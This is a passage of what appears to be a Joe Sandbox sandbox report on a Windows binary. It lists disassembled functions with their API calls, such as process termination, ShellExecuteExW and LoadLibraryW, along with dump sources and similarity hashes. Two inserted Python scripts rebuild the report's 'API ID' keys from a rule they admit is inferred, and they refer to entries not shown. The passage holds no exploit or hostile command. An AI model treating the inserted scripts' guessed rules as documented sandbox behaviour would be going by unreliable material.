• MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007C94AA
• LineTo.GDI32(?,00000003,00000000), ref: 007C94BE
• MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007C94CC
• LineTo.GDI32(?,00000000,00000003), ref: 007C94DC
• EndPath.GDI32(?), ref: 007C94EC
• StrokePath.GDI32(?), ref: 007C94FC
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 802fd96c229691c41848e9ef9a6e7874fcb0abba1ee44c47da5bb7c72ae58c52
• Instruction ID: 01f3c45b4a0ffd57eda6e43e98bb1c595b465245f730acada08b80f780df4961
• Opcode Fuzzy Hash: 802fd96c229691c41848e9ef9a6e7874fcb0abba1ee44c47da5bb7c72ae58c52
• Instruction Fuzzy Hash: 1E111B7600014DBFEF129F94DC88E9A7F6DEF08360F04C029BA194A1A1D7759E95DBA4
Uniqueness

Uniqueness Score: -1.00%

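The "API ID" under each Similarity heading is the key Joe Sandbox uses to group functions with the same API usage across reports, which is what lets an analyst match a function in one sample's dump against another. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses the APIs listing format used in these entries (bullet, API name, module, optional argument list, and the ref address, with "Part of subcall function" lines nested one level deeper) and rebuilds the API ID from the parsed names. The derivation rule it implements (split the API name at camel-case boundaries, keep only tokens of four or more characters, count tokens across all listed calls, emit count groups from most to least frequent separated by `$`, and sort tokens inside a group in ASCII order) is inferred from the five complete entries in this section, not taken from Joe Sandbox documentation, so it is an assumption; it reproduces all five IDs shown above. The numeric API String ID and the fuzzy hashes are not reconstructed.

```python
import re
from collections import Counter

# Constructed sample: the APIs listing of the second entry above, copied verbatim.
SAMPLE_LISTING = """\
• GetWindowLongW.USER32(?,000000F0), ref: 007C8740
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 007C8765
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007C877D
• GetSystemMetrics.USER32(00000004), ref: 007C87A6
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007AC1F2,00000000), ref: 007C87C6
  • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• GetSystemMetrics.USER32(00000004), ref: 007C87B1
"""

# API names and the API ID Joe Sandbox printed for them, copied from the five
# complete entries in this section (used to check the inferred derivation rule).
ENTRIES = {
    "CreateFullInitializeInstanceNamePathUninitialize_wcslen": [
        "GetFullPathNameW", "_wcslen", "CoInitialize", "CoCreateInstance", "CoUninitialize",
    ],
    "Window$Long$MetricsSystem": [
        "GetWindowLongW", "SetWindowLongW", "SetWindowLongW", "GetSystemMetrics",
        "SetWindowPos", "GetWindowLongW", "GetSystemMetrics",
    ],
    "ErrorLastValue___vcrt_": [
        "GetLastError", "___vcrt_FlsGetValue", "___vcrt_FlsSetValue", "SetLastError",
    ],
    "ErrorLast$_free$_abort": [
        "GetLastError", "_free", "_free", "SetLastError", "SetLastError", "_abort",
    ],
    "Path$LineMoveObjectSelect$BeginCreateStroke": [
        "ExtCreatePen", "SelectObject", "BeginPath", "SelectObject", "MoveToEx",
        "LineTo", "MoveToEx", "LineTo", "EndPath", "StrokePath",
    ],
}

# One listing line: "• [Part of subcall function XXXX: ]Api.MODULE[(args)][,] ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9_]+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-F]+)"
)


def parse_api_listing(text):
    """Turn an APIs listing into dicts of api, module, args, ref and subcall flag."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings such as "APIs" or unrelated lines
        api, module, args, ref = m.groups()
        calls.append({
            "api": api,
            "module": module,
            "args": args.split(",") if args else [],
            "ref": ref,
            "subcall": "Part of subcall function" in line,
        })
    return calls


def api_tokens(name):
    """Split an API name at camel-case boundaries; drop tokens shorter than 4 chars.
    Assumed rule: it is what makes Get/Set/Co/W/Fls/Pos vanish from the page's IDs."""
    return [t for t in re.findall(r"[A-Z][a-z0-9]*|[^A-Z]+", name) if len(t) >= 4]


def api_id(api_names):
    """Rebuild the Similarity 'API ID' (inferred format, see lead-in)."""
    counts = Counter(t for n in api_names for t in api_tokens(n))
    groups = {}
    for tok, c in counts.items():
        groups.setdefault(c, []).append(tok)
    # most frequent tokens first; ASCII sort inside a group ('_' sorts after 'Z')
    return "$".join("".join(sorted(groups[c])) for c in sorted(groups, reverse=True))


def reproduce_page_ids():
    """Map each API ID printed on this page to the ID the inferred rule computes."""
    return {expected: api_id(apis) for expected, apis in ENTRIES.items()}


if __name__ == "__main__":
    calls = parse_api_listing(SAMPLE_LISTING)
    print("parsed %d calls, API ID = %s" % (len(calls), api_id([c["api"] for c in calls])))
    for expected, computed in reproduce_page_ids().items():
        print("%-55s %s" % (expected, "match" if expected == computed else computed))
```

`parse_api_listing` keeps argument values as the hex strings the report prints, so a follow-up step can look at them directly (for example the first entry's CoCreateInstance with the `.lnk` string, or the SetWindowLongW calls here) without guessing at their signedness. Because `api_id` only needs API names, the same function can be fed names from your own disassembly to produce an ID to search for in other reports; the rule is inferred, so spot-check it against a few printed IDs before relying on it.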
APIs
• GetDC.USER32(00000000), ref: 00795B7C
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00795B8D
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00795B94
• ReleaseDC.USER32(00000000,00000000), ref: 00795B9C
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00795BB3
• MulDiv.KERNEL32(000009EC,00000001,?), ref: 00795BC5
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                          • Opcode ID: 03f450c518a3ecedcab993afec67a747260dd07b4aaf9776511096f4f722ec77
                                                                                                                                                                                          • Instruction ID: 0daf311435c6c629c3f501ad5e1e139e6125064b9b4d7043e901cb4a6238052c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03f450c518a3ecedcab993afec67a747260dd07b4aaf9776511096f4f722ec77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 780144B5A00718BBEF119BE99C49F4EBF78EB44751F048069FA05A7280D6749C01CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007332AF
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 007332B7
                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007332C2
                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007332CD
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 007332D5
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 007332DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                          • Opcode ID: 1dd98167c27e27a39d64a3ab0498883250d3e95d2e9dc08ef0e9dc5fa649ff99
                                                                                                                                                                                          • Instruction ID: a30a5a0c62fea9a5b175e8460b56fd164fe46796c6cd1751effc2d51f9ba5c25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd98167c27e27a39d64a3ab0498883250d3e95d2e9dc08ef0e9dc5fa649ff99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5AC64CBE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0079F447
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0079F45D
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0079F46C
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F47B
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F485
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F48C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                                          • Opcode ID: cb6f29cd2412d41f35f19e2ef778d358bbec1434854449163aee0fb2d32100aa
                                                                                                                                                                                          • Instruction ID: d72128a58d6d31ef6be956433495d4f36dba1c9b0a6fce433e23b85659ccda33
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6f29cd2412d41f35f19e2ef778d358bbec1434854449163aee0fb2d32100aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF01D72241558BBE73157929C0EEEB7B7CEBC6B51F04406CF601A119096A85E42C6B9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 007734EF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00773506
                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00773512
                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00773521
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00773533
                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0077354D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                                          • Opcode ID: e0afb57cf9721bcbe283286ec6bd96fa9498638083ec0c566c166eb4e8055d60
                                                                                                                                                                                          • Instruction ID: d2b4672c85ec748644bff49a867214f4871d5f3f88386145aa80ab640f1c7369
                                                                                                                                                                                          • Opcode Fuzzy Hash: e0afb57cf9721bcbe283286ec6bd96fa9498638083ec0c566c166eb4e8055d60
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3014B31500105EFEB605FA4DC08FE97BB1FB04361F518178F91AA21A1CB391E62EF10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007921CC
                                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 007921D8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007921E1
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007921E9
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007921F2
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007921F9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 146765662-0
                                                                                                                                                                                          • Opcode ID: 74698401c4d19fc816728bc119abd2216c6118c55cbab41860199932f99228b5
                                                                                                                                                                                          • Instruction ID: d7d7759c1356651994ba3437b413553d45f2862f36d08b541276c4948f9c171b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 74698401c4d19fc816728bc119abd2216c6118c55cbab41860199932f99228b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0BE0C976004509BBD7111BE1EC0CD05BF29FB493217168238F22582070CB3A5821DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
    • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079CF99
  • _wcslen.LIBCMT ref: 0079CFE0
  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079D047
  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0079D075
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
  • API ID: ItemMenu$Info_wcslen$Default
  • String ID: 0
  • API String ID: 1227352736-4108050209
  • Opcode ID: 097f6d4eeae75787bfa25058633af718e6119db51948a77f561435c7a3e7949e
  • Instruction ID: ef15509ad1c791fc38027dd99d63cbe792e04315740a4de06574eaa7bcd7c9c8
  • Opcode Fuzzy Hash: 097f6d4eeae75787bfa25058633af718e6119db51948a77f561435c7a3e7949e
  • Instruction Fuzzy Hash: 5251EE326043009BEF25EE28E849BAFBBE9EF45314F040A2DF991D3191DBB8CD058752
Uniqueness
  • Uniqueness Score: -1.00%

APIs
  • ShellExecuteExW.SHELL32(0000003C), ref: 007BB903
    • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
  • GetProcessId.KERNEL32(00000000), ref: 007BB998
  • CloseHandle.KERNEL32(00000000), ref: 007BB9C7
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
  • API ID: CloseExecuteHandleProcessShell_wcslen
  • String ID: <$@
  • API String ID: 146682121-1426351568
  • Opcode ID: 0bf2035923479a0b53eb28361c2e0a8ca518e09ec143e97d265a8fd400f89c77
  • Instruction ID: 7491ffae3d8a12af822b81a9b8a8e4ba7046b295ca2ae50c3d5711545be04a35
  • Opcode Fuzzy Hash: 0bf2035923479a0b53eb28361c2e0a8ca518e09ec143e97d265a8fd400f89c77
  • Instruction Fuzzy Hash: 12719A74A00619DFDB14EF64C488A9EBBF4FF08300F048499E856AB352CBB8ED45CB91
Uniqueness
  • Uniqueness Score: -1.00%

APIs
  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00797B6D
  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00797BA3
  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00797BB4
  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00797C36
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
  • API ID: ErrorMode$AddressCreateInstanceProc
  • String ID: DllGetClassObject
  • API String ID: 753597075-1075368562
  • Opcode ID: 193d00939ebdc21e65e3ba4574b520877b20b0cbd8bc9ea9fd2b987f3dc2b54d
  • Instruction ID: 31a699789ff37381b285c96e1588db4e6dfecfdb56f15aa9783f316de0e0ae52
  • Opcode Fuzzy Hash: 193d00939ebdc21e65e3ba4574b520877b20b0cbd8bc9ea9fd2b987f3dc2b54d
  • Instruction Fuzzy Hash: C641C0B1614204EFDF19CF24E884A9A7BBDEF45310F1480ADE9099F245D7B8ED40CBA0
Uniqueness
  • Uniqueness Score: -1.00%

APIs
  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007C48D1
  • IsMenu.USER32(?), ref: 007C48E6
  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007C492E
  • DrawMenuBar.USER32 ref: 007C4941
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
  • API ID: Menu$Item$DrawInfoInsert
  • String ID: 0
  • API String ID: 3076010158-4108050209
  • Opcode ID: 2298d1e7aa16a089def2d32890f82b9121c1c5ee8710144fbd61ce73d55c2d23
  • Instruction ID: 78abe051d48ac8253bc23b01e8ea72b080026e9334b33dc159fc09137cf27218
  • Opcode Fuzzy Hash: 2298d1e7aa16a089def2d32890f82b9121c1c5ee8710144fbd61ce73d55c2d23
  • Instruction Fuzzy Hash: 56415975A00219EFDB10CF55D894EAABBB9FF06324F04812DF955A7250C738ED55CB60
Uniqueness
  • Uniqueness Score: -1.00%

APIs
    • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
    • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007927B3
  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007927C6
  • SendMessageW.USER32(?,00000189,?,00000000), ref: 007927F6
    • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
Strings
Memory Dump Source
  • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
  • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
  • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
  • API ID: MessageSend$_wcslen$ClassName
  • String ID: ComboBox$ListBox
  • API String ID: 2081771294-1403004172
  • Opcode ID: 4804cb7dad4a603891a43799e51c3e313f9a6a491e0f133d8da741b2cf62b117
  • Instruction ID: 5ee59cc017d5075fe98b562cfded1146d1cfe882784ceaeec32ab721a560f5e9
  • Opcode Fuzzy Hash: 4804cb7dad4a603891a43799e51c3e313f9a6a491e0f133d8da741b2cf62b117
  • Instruction Fuzzy Hash: 9D21E771A00108BEDF15ABA4EC4ADFEB7B8DF453A0F104129F511A71E2CB7C4D0A9A60
Uniqueness
  • Uniqueness Score: -1.00%
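The function entries above list every call as `Name.MODULE(args), ref: VA` and collapse the call names into an "API ID" similarity key. The Python below is an added example for working through such entries offline; it is not part of the Joe Sandbox report or its tooling. It parses the API bullets (the two sample blocks are copied from the menu and ShellExecuteExW entries on this page) and rebuilds the key. The key derivation is an inference from the entries visible here (split CamelCase, drop tokens of three characters or fewer, group by call count, sort by code point within a group) and is an assumption, not Joe Sandbox's documented algorithm.

```python
"""Parse the 'APIs' bullets of Joe Sandbox function entries and rebuild
the 'API ID' similarity key from them.

Added example, not Joe Sandbox code. The API ID rule is inferred from the
entries on this page and is an assumption, not a documented algorithm.
"""
import re
from collections import Counter

# Constructed samples: two 'APIs' blocks copied from entries in this report.
MENU_ENTRY = """\
    • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079CF99
  • _wcslen.LIBCMT ref: 0079CFE0
  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0079D047
  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0079D075
"""

SHELL_ENTRY = """\
  • ShellExecuteExW.SHELL32(0000003C), ref: 007BB903
    • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
  • GetProcessId.KERNEL32(00000000), ref: 007BB998
  • CloseHandle.KERNEL32(00000000), ref: 007BB9C7
"""

# Name.MODULE(args), ref: VA  -- the argument list and the comma are optional
# (compare "DrawMenuBar.USER32 ref: 007C4941" in the report).
API_LINE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# One CamelCase word, or a C-runtime style name such as _wcslen.
WORD = re.compile(r"_[a-z0-9]+|[A-Z][a-z0-9]*")


def parse_api_lines(text):
    """Return one dict per bullet: api, module, args, ref (int), subcall flag."""
    calls = []
    for raw in text.splitlines():
        m = API_LINE.search(raw)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": "Part of subcall function" in raw,
        })
    return calls


def api_words(name):
    """Tokens of an API name that survive the inferred filter (longer than 3)."""
    return [w for w in WORD.findall(name) if len(w) > 3]


def api_id(calls):
    """Rebuild the 'API ID' key (assumed rule): groups by descending call count,
    '$' separated, words sorted by code point inside a group ('_wcslen' last)."""
    counts = Counter(w for c in calls for w in api_words(c["api"]))
    by_count = {}
    for word, n in counts.items():
        by_count.setdefault(n, []).append(word)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def modules_used(calls):
    """DLLs a function touches; handy for spotting SHELL32/OLE32 users quickly."""
    return sorted({c["module"] for c in calls})


if __name__ == "__main__":
    for label, block in (("menu", MENU_ENTRY), ("shell", SHELL_ENTRY)):
        calls = parse_api_lines(block)
        print(label, modules_used(calls), api_id(calls))
        for c in calls:
            tag = "  (subcall)" if c["subcall"] else ""
            print(f"  {c['ref']:08X} {c['api']}.{c['module']}{tag}")
```

Running the script against the two sample blocks reproduces the keys shown on this page, `ItemMenu$Info_wcslen$Default` and `CloseExecuteHandleProcessShell_wcslen`; if an entry elsewhere in the report disagrees, the inferred rule is what needs adjusting, not the parser.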

APIs
  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 007C3A29
  • LoadLibraryW.KERNEL32(?), ref: 007C3A30
